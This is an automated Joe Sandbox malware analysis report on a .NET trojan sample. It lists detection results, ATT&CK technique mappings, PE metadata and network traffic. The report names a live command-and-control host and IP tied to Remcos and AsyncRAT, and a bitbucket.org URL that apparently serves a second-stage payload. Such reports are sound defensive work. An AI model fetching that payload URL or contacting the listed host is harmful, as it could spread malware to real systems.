              Application Window Discovery              		Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script22
              Software Packing              		LSA Secrets123
              System Information Discovery              		SSHKeylogging3
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Timestomp              		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              fIPSLgT0lO.exe63%ReversingLabsByteCode-MSIL.Trojan.Heracles
              fIPSLgT0lO.exe100%AviraHEUR/AGEN.1323341
              fIPSLgT0lO.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              No Antivirus matches

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              formationslistcomplet2.sexidude.com
              		181.131.217.244
              		truefalse
                		high
                bitbucket.org
                		185.166.143.49
                		truefalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://bitbucket.org/facturacioncol/fact/downloads/null.exefalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.netfIPSLgT0lO.exe, 00000000.00000002.2928319421.00000000036A8000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://github.com/mgravell/protobuf-netifIPSLgT0lO.exe, 00000000.00000002.2930276212.0000000005860000.00000004.08000000.00040000.00000000.sdmpfalse
                        		high
                        https://stackoverflow.com/q/14436606/23354fIPSLgT0lO.exe, 00000000.00000002.2928319421.0000000003391000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2930276212.0000000005860000.00000004.08000000.00040000.00000000.sdmpfalse
                          		high
                          https://github.com/mgravell/protobuf-netJfIPSLgT0lO.exe, 00000000.00000002.2930276212.0000000005860000.00000004.08000000.00040000.00000000.sdmpfalse
                            		high
                            https://remote-app-switcher.prod-east.frontend.public.atl-paas.netfIPSLgT0lO.exe, 00000000.00000002.2928319421.000000000344B000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.0000000003447000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.00000000036AC000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.000000000368C000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.00000000036A8000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.netfIPSLgT0lO.exe, 00000000.00000002.2928319421.00000000036A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://stackoverflow.com/q/11564914/23354;fIPSLgT0lO.exe, 00000000.00000002.2930276212.0000000005860000.00000004.08000000.00040000.00000000.sdmpfalse
                                  		high
                                  https://stackoverflow.com/q/2152978/23354fIPSLgT0lO.exe, 00000000.00000002.2930276212.0000000005860000.00000004.08000000.00040000.00000000.sdmpfalse
                                    		high
                                    http://bitbucket.orgfIPSLgT0lO.exe, 00000000.00000002.2928319421.000000000368C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://web-security-reports.services.atlassian.com/csp-report/bb-websitefIPSLgT0lO.exe, 00000000.00000002.2928319421.000000000344B000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.0000000003447000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.00000000036AC000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.000000000368C000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.00000000036A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://cdn.cookielaw.org/fIPSLgT0lO.exe, 00000000.00000002.2928319421.000000000344B000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.0000000003447000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.00000000036AC000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.000000000368C000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.00000000036A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;fIPSLgT0lO.exe, 00000000.00000002.2928319421.00000000036A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://github.com/mgravell/protobuf-netfIPSLgT0lO.exe, 00000000.00000002.2930276212.0000000005860000.00000004.08000000.00040000.00000000.sdmpfalse
                                              		high
                                              https://aui-cdn.atlassian.com/fIPSLgT0lO.exe, 00000000.00000002.2928319421.000000000344B000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.0000000003447000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.00000000036AC000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.000000000368C000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.00000000036A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/fIPSLgT0lO.exe, 00000000.00000002.2928319421.00000000036A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://remote-app-switcher.stg-east.frontend.public.atl-paas.netfIPSLgT0lO.exe, 00000000.00000002.2928319421.000000000344B000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.0000000003447000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.00000000036AC000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.000000000368C000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.00000000036A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://bbuseruploads.s3.amazonaws.com/986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-fIPSLgT0lO.exe, 00000000.00000002.2928319421.000000000344B000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.00000000036AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namefIPSLgT0lO.exe, 00000000.00000002.2928319421.0000000003391000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.00000000036B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/fIPSLgT0lO.exe, 00000000.00000002.2928319421.00000000036A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://bitbucket.orgfIPSLgT0lO.exe, 00000000.00000002.2928319421.000000000367A000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.0000000003391000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.netfIPSLgT0lO.exe, 00000000.00000002.2928319421.00000000036A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://dz8aopenkvv6s.cloudfront.netfIPSLgT0lO.exe, 00000000.00000002.2928319421.000000000344B000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.0000000003447000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.00000000036AC000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.000000000368C000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2928319421.00000000036A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high

                                                                World Map of Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public IPs

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                181.131.217.244
                                                                		formationslistcomplet2.sexidude.comColombia
                                                                		13489EPMTelecomunicacionesSAESPCOfalse
                                                                185.166.143.49
                                                                		bitbucket.orgGermany
                                                                		16509AMAZON-02USfalse

                                                                General Information

                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1573902
                                                                Start date and time:2024-12-12 17:48:59 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 5m 20s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:5
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:fIPSLgT0lO.exe
                                                                renamed because original name is a hash value
                                                                Original Sample Name:3c4c48003d8ddf5dc37e44fb340e81951ccb473dbb548e9752b83c69291a54f1.exe
                                                                Detection:MAL
                                                                Classification:mal84.evad.winEXE@1/0@11/2
                                                                EGA Information:
                                                                • Successful, ratio: 100%
                                                                HCA Information:
                                                                • Successful, ratio: 91%
                                                                • Number of executed functions: 105
                                                                • Number of non-executed functions: 20
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe

                                                                Warnings

                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • VT rate limit hit for: fIPSLgT0lO.exe

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                11:49:55API Interceptor1769147x Sleep call for process: fIPSLgT0lO.exe modified

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                181.131.217.2443XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                                                                  ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                                    pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                      sXpIsdpkzy.exeGet hashmaliciousRemcosBrowse
                                                                        hCJ8gK9kNn.exeGet hashmaliciousRemcosBrowse
                                                                          x4fDy1muYs.exeGet hashmaliciousUnknownBrowse
                                                                            VwiELrqQjD.exeGet hashmaliciousRemcosBrowse
                                                                              ozfqy8Ms6t.exeGet hashmaliciousUnknownBrowse
                                                                                3XSXmrEOw7.exeGet hashmaliciousUnknownBrowse
                                                                                  pPLwX9wSrD.exeGet hashmaliciousUnknownBrowse
                                                                                    185.166.143.49http://jasonj002.bitbucket.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                    • jasonj002.bitbucket.io/

                                                                                    Domains

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    bitbucket.org3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                                                                                    • 185.166.143.48
                                                                                    ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                                                    • 185.166.143.48
                                                                                    pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                                    • 185.166.143.50
                                                                                    hCJ8gK9kNn.exeGet hashmaliciousRemcosBrowse
                                                                                    • 185.166.143.49
                                                                                    x4fDy1muYs.exeGet hashmaliciousUnknownBrowse
                                                                                    • 185.166.143.48
                                                                                    ozfqy8Ms6t.exeGet hashmaliciousUnknownBrowse
                                                                                    • 185.166.143.50
                                                                                    3XSXmrEOw7.exeGet hashmaliciousUnknownBrowse
                                                                                    • 185.166.143.50
                                                                                    pPLwX9wSrD.exeGet hashmaliciousUnknownBrowse
                                                                                    • 185.166.143.50
                                                                                    hCJ8gK9kNn.exeGet hashmaliciousUnknownBrowse
                                                                                    • 185.166.143.49
                                                                                    https://feji.us/m266heGet hashmaliciousUnknownBrowse
                                                                                    • 185.166.143.50
                                                                                    formationslistcomplet2.sexidude.comx4fDy1muYs.exeGet hashmaliciousUnknownBrowse
                                                                                    • 181.131.217.244
                                                                                    VwiELrqQjD.exeGet hashmaliciousRemcosBrowse
                                                                                    • 181.131.217.244
                                                                                    s0tuvMen1D.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                    • 181.131.217.244
                                                                                    SYSnyI8qDu.exeGet hashmaliciousRemcosBrowse
                                                                                    • 181.131.217.244
                                                                                    QU4rXM7CiL.exeGet hashmaliciousRemcosBrowse
                                                                                    • 181.131.217.244
                                                                                    4wECQoBvYC.exeGet hashmaliciousRemcosBrowse
                                                                                    • 181.131.217.244
                                                                                    nlfb.exeGet hashmaliciousUnknownBrowse
                                                                                    • 181.131.217.244
                                                                                    nlfb.exeGet hashmaliciousUnknownBrowse
                                                                                    • 181.131.217.244
                                                                                    qtIh.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                    • 181.131.217.244
                                                                                    KWAo.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                    • 181.131.217.244

                                                                                    ASNs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    EPMTelecomunicacionesSAESPCO3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                                                                                    • 181.131.217.244
                                                                                    ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                                                    • 181.131.217.244
                                                                                    pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                                    • 181.131.217.244
                                                                                    sXpIsdpkzy.exeGet hashmaliciousRemcosBrowse
                                                                                    • 181.131.217.244
                                                                                    hCJ8gK9kNn.exeGet hashmaliciousRemcosBrowse
                                                                                    • 181.131.217.244
                                                                                    x4fDy1muYs.exeGet hashmaliciousUnknownBrowse
                                                                                    • 181.131.217.244
                                                                                    VwiELrqQjD.exeGet hashmaliciousRemcosBrowse
                                                                                    • 181.131.217.244
                                                                                    ozfqy8Ms6t.exeGet hashmaliciousUnknownBrowse
                                                                                    • 181.131.217.244
                                                                                    3XSXmrEOw7.exeGet hashmaliciousUnknownBrowse
                                                                                    • 181.131.217.244
                                                                                    pPLwX9wSrD.exeGet hashmaliciousUnknownBrowse
                                                                                    • 181.131.217.244
                                                                                    AMAZON-02US3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                                                                                    • 185.166.143.48
                                                                                    ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                                                    • 185.166.143.48
                                                                                    pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                                    • 54.231.193.17
                                                                                    hCJ8gK9kNn.exeGet hashmaliciousRemcosBrowse
                                                                                    • 185.166.143.49
                                                                                    x4fDy1muYs.exeGet hashmaliciousUnknownBrowse
                                                                                    • 185.166.143.48
                                                                                    ozfqy8Ms6t.exeGet hashmaliciousUnknownBrowse
                                                                                    • 185.166.143.50
                                                                                    3XSXmrEOw7.exeGet hashmaliciousUnknownBrowse
                                                                                    • 185.166.143.50
                                                                                    pPLwX9wSrD.exeGet hashmaliciousUnknownBrowse
                                                                                    • 185.166.143.50
                                                                                    hCJ8gK9kNn.exeGet hashmaliciousUnknownBrowse
                                                                                    • 185.166.143.49
                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                    • 18.238.49.124

                                                                                    JA3 Fingerprints

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    3b5074b1b5d032e5620f69f9f700ff0e3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                                                                                    • 185.166.143.49
                                                                                    ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                                                    • 185.166.143.49
                                                                                    pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                                    • 185.166.143.49
                                                                                    hCJ8gK9kNn.exeGet hashmaliciousRemcosBrowse
                                                                                    • 185.166.143.49
                                                                                    x4fDy1muYs.exeGet hashmaliciousUnknownBrowse
                                                                                    • 185.166.143.49
                                                                                    ozfqy8Ms6t.exeGet hashmaliciousUnknownBrowse
                                                                                    • 185.166.143.49
                                                                                    3XSXmrEOw7.exeGet hashmaliciousUnknownBrowse
                                                                                    • 185.166.143.49
                                                                                    pPLwX9wSrD.exeGet hashmaliciousUnknownBrowse
                                                                                    • 185.166.143.49
                                                                                    hCJ8gK9kNn.exeGet hashmaliciousUnknownBrowse
                                                                                    • 185.166.143.49
                                                                                    NOTIFICACIONES+FISCALES+Y+DEMANDAS+PENDIENTES.pdf.pdfGet hashmaliciousUnknownBrowse
                                                                                    • 185.166.143.49

                                                                                    Dropped Files

                                                                                    No context

                                                                                    Created / dropped Files

                                                                                    No created / dropped files found

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Entropy (8bit):7.934254491114372
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                    File name:fIPSLgT0lO.exe
                                                                                    File size:606'720 bytes
                                                                                    MD5:016d22f02af7424e8d99c6c243adcdb7
                                                                                    SHA1:1a4148700ab479b4c455a1eb9d5f48ac56799054
                                                                                    SHA256:3c4c48003d8ddf5dc37e44fb340e81951ccb473dbb548e9752b83c69291a54f1
                                                                                    SHA512:4475237cafdc0f1b678fba94c63b755b8451062da7fd69b4bd4276dc0926bf7b45e63ab4a85dbb3f2e781f8aef00a1938d9dc86b05f5935e957ce3c6d3ad08f6
                                                                                    SSDEEP:12288:Xzt4ktnPfSk1fXq1nThCpEOFYTJu+qHUM0LvnOuvtICV:CGf184pEO+TJaUMOnhIC
                                                                                    TLSH:EED41292768B17A0C645403868FB9D1923F563822A33EBE3799D429E9DD3781CF50FC9
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....V................0..8...........W... ...`....@.. ....................................@................................

                                                                                    File Icon

                                                                                    Icon Hash:90cececece8e8eb0

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x4957ce
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0xA90F56EF [Tue Nov 18 04:19:59 2059 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    jmp dword ptr [00402000h]
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al

                                                                                    Data Directories

                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x957800x4b.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x960000x570.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x980000xc.reloc
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                    Sections

                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x20000x937d40x9380023132605f91acbc32dc54b65f802303eFalse0.9512529793432203data7.941976982068131IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .rsrc0x960000x5700x600177803e1d307ad9f6e72bb66ec34b7c2False0.4055989583333333data3.9668451251431556IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .reloc0x980000xc0x200d196c65357c937e5cd009d7fb9d8cd13False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                    Resources

                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                    RT_VERSION0x960a00x2e4data0.4297297297297297
                                                                                    RT_MANIFEST0x963840x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                    Imports

                                                                                    DLLImport
                                                                                    mscoree.dll_CorExeMain

                                                                                    Network Behavior

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Dec 12, 2024 17:49:55.795459986 CET4973030203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:49:55.915394068 CET3020349730181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:49:55.915611029 CET4973030203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:49:55.924227953 CET4973030203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:49:56.044753075 CET3020349730181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:49:56.044819117 CET4973030203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:49:56.171276093 CET3020349730181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:50:06.299830914 CET3020349730181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:50:06.354743004 CET4973030203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:06.533725977 CET3020349730181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:50:06.537235975 CET4973030203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:06.665148020 CET3020349730181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:50:06.665298939 CET4973030203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:06.881850004 CET49731443192.168.2.4185.166.143.49
                                                                                    Dec 12, 2024 17:50:06.881896973 CET44349731185.166.143.49192.168.2.4
                                                                                    Dec 12, 2024 17:50:06.881983995 CET49731443192.168.2.4185.166.143.49
                                                                                    Dec 12, 2024 17:50:06.945902109 CET49731443192.168.2.4185.166.143.49
                                                                                    Dec 12, 2024 17:50:06.945931911 CET44349731185.166.143.49192.168.2.4
                                                                                    Dec 12, 2024 17:50:08.710685015 CET44349731185.166.143.49192.168.2.4
                                                                                    Dec 12, 2024 17:50:08.710863113 CET49731443192.168.2.4185.166.143.49
                                                                                    Dec 12, 2024 17:50:08.715107918 CET49731443192.168.2.4185.166.143.49
                                                                                    Dec 12, 2024 17:50:08.715128899 CET44349731185.166.143.49192.168.2.4
                                                                                    Dec 12, 2024 17:50:08.715658903 CET44349731185.166.143.49192.168.2.4
